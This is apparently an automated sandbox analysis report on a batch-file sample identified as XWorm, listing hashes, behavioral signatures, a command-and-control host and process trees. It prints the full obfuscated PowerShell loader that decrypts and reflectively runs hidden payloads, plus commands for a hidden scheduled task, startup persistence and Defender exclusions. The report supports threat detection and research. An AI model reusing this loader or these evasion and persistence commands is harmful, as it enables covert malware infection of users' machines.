Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
04/03/2025, 02:23
Static task
static1
Behavioral task
behavioral1
Sample
348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat
Resource
win10v2004-20250217-en
General
-
Target
348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat
-
Size
94KB
-
MD5
a5bd53f790ed63251d0f435b17ada13d
-
SHA1
c0ada960a41596819df77f185dfe79b730ade6c8
-
SHA256
348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e
-
SHA512
fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0
-
SSDEEP
1536:y3UhPdcYkDCDYe694UQ3DvwDnqFDdbYdLRmUpDLHcfVWeIZ9U1mRDLOeBrT:y3K6Yb694VzvweEUUefVmZOwRDLOW
Malware Config
Extracted
xworm
moneyfraud-30212.portmap.host:30212
-
Install_directory
%Userprofile%
-
install_file
SvcManager.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2864-48-0x00000233F4E50000-0x00000233F4E68000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 14 IoCs
flow pid Process 32 2864 powershell.exe 33 2864 powershell.exe 46 2864 powershell.exe 58 2864 powershell.exe 59 2864 powershell.exe 62 2864 powershell.exe 64 2864 powershell.exe 65 2864 powershell.exe 69 2864 powershell.exe 71 2864 powershell.exe 72 2864 powershell.exe 73 2864 powershell.exe 74 2864 powershell.exe 75 2864 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 3880 powershell.exe 4984 powershell.exe 2864 powershell.exe 1704 powershell.exe 440 powershell.exe 3308 powershell.exe 3404 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SvcManager.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SvcManager.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SvcManager = "C:\\Users\\Admin\\SvcManager.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 3880 powershell.exe 3880 powershell.exe 4984 powershell.exe 4984 powershell.exe 2864 powershell.exe 2864 powershell.exe 2864 powershell.exe 1704 powershell.exe 1704 powershell.exe 440 powershell.exe 440 powershell.exe 3308 powershell.exe 3308 powershell.exe 3404 powershell.exe 3404 powershell.exe 2864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3880 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeIncreaseQuotaPrivilege 4984 powershell.exe Token: SeSecurityPrivilege 4984 powershell.exe Token: SeTakeOwnershipPrivilege 4984 powershell.exe Token: SeLoadDriverPrivilege 4984 powershell.exe Token: SeSystemProfilePrivilege 4984 powershell.exe Token: SeSystemtimePrivilege 4984 powershell.exe Token: SeProfSingleProcessPrivilege 4984 powershell.exe Token: SeIncBasePriorityPrivilege 4984 powershell.exe Token: SeCreatePagefilePrivilege 4984 powershell.exe Token: SeBackupPrivilege 4984 powershell.exe Token: SeRestorePrivilege 4984 powershell.exe Token: SeShutdownPrivilege 4984 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeSystemEnvironmentPrivilege 4984 powershell.exe Token: SeRemoteShutdownPrivilege 4984 powershell.exe Token: SeUndockPrivilege 4984 powershell.exe Token: SeManageVolumePrivilege 4984 powershell.exe Token: 33 4984 powershell.exe Token: 34 4984 powershell.exe Token: 35 4984 powershell.exe Token: 36 4984 powershell.exe Token: SeIncreaseQuotaPrivilege 4984 powershell.exe Token: SeSecurityPrivilege 4984 powershell.exe Token: SeTakeOwnershipPrivilege 4984 powershell.exe Token: SeLoadDriverPrivilege 4984 powershell.exe Token: SeSystemProfilePrivilege 4984 powershell.exe Token: SeSystemtimePrivilege 4984 powershell.exe Token: SeProfSingleProcessPrivilege 4984 powershell.exe Token: SeIncBasePriorityPrivilege 4984 powershell.exe Token: SeCreatePagefilePrivilege 4984 powershell.exe Token: SeBackupPrivilege 4984 powershell.exe Token: SeRestorePrivilege 4984 powershell.exe Token: SeShutdownPrivilege 4984 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeSystemEnvironmentPrivilege 4984 powershell.exe Token: SeRemoteShutdownPrivilege 4984 powershell.exe Token: SeUndockPrivilege 4984 powershell.exe Token: SeManageVolumePrivilege 4984 powershell.exe Token: 33 4984 powershell.exe Token: 34 4984 powershell.exe Token: 35 4984 powershell.exe Token: 36 4984 powershell.exe Token: SeIncreaseQuotaPrivilege 4984 powershell.exe Token: SeSecurityPrivilege 4984 powershell.exe Token: SeTakeOwnershipPrivilege 4984 powershell.exe Token: SeLoadDriverPrivilege 4984 powershell.exe Token: SeSystemProfilePrivilege 4984 powershell.exe Token: SeSystemtimePrivilege 4984 powershell.exe Token: SeProfSingleProcessPrivilege 4984 powershell.exe Token: SeIncBasePriorityPrivilege 4984 powershell.exe Token: SeCreatePagefilePrivilege 4984 powershell.exe Token: SeBackupPrivilege 4984 powershell.exe Token: SeRestorePrivilege 4984 powershell.exe Token: SeShutdownPrivilege 4984 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeSystemEnvironmentPrivilege 4984 powershell.exe Token: SeRemoteShutdownPrivilege 4984 powershell.exe Token: SeUndockPrivilege 4984 powershell.exe Token: SeManageVolumePrivilege 4984 powershell.exe Token: 33 4984 powershell.exe Token: 34 4984 powershell.exe Token: 35 4984 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2864 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4576 wrote to memory of 3880 4576 cmd.exe 88 PID 4576 wrote to memory of 3880 4576 cmd.exe 88 PID 3880 wrote to memory of 4984 3880 powershell.exe 90 PID 3880 wrote to memory of 4984 3880 powershell.exe 90 PID 3880 wrote to memory of 2892 3880 powershell.exe 94 PID 3880 wrote to memory of 2892 3880 powershell.exe 94 PID 2892 wrote to memory of 1648 2892 WScript.exe 95 PID 2892 wrote to memory of 1648 2892 WScript.exe 95 PID 1648 wrote to memory of 2864 1648 cmd.exe 98 PID 1648 wrote to memory of 2864 1648 cmd.exe 98 PID 2864 wrote to memory of 1704 2864 powershell.exe 100 PID 2864 wrote to memory of 1704 2864 powershell.exe 100 PID 2864 wrote to memory of 440 2864 powershell.exe 102 PID 2864 wrote to memory of 440 2864 powershell.exe 102 PID 2864 wrote to memory of 3308 2864 powershell.exe 104 PID 2864 wrote to memory of 3308 2864 powershell.exe 104 PID 2864 wrote to memory of 3404 2864 powershell.exe 106 PID 2864 wrote to memory of 3404 2864 powershell.exe 106
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Local\Temp\348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_732_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_732.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_732.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_732.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Roaming\startup_str_732.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\SvcManager.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SvcManager.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3404
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5dbbf71e9fb59f80938f09809b160e441
SHA18b9a517d846cb9a0a284f77ed88328236a85055f
SHA256e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1
SHA51290b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD510890cda4b6eab618e926c4118ab0647
SHA11e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA25600f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
94KB
MD5a5bd53f790ed63251d0f435b17ada13d
SHA1c0ada960a41596819df77f185dfe79b730ade6c8
SHA256348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e
SHA512fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0
-
Filesize
115B
MD537663bdd1a21a02d83623e8fa7a34bfa
SHA1b43afb4dec023343a4ecacc666a507ce508efab4
SHA256c53514676782927650368ef6fde0b31ebcfd265afc942a0c190b6a538823ad5c
SHA51230400f6c54d00f9ea8a32b58a2d82fc602365dc45310d67429520e218631b10e720ed46ab95306ea88519c7b1cbaa641a9d6feb78745bdc0453ca8e25e9ad21f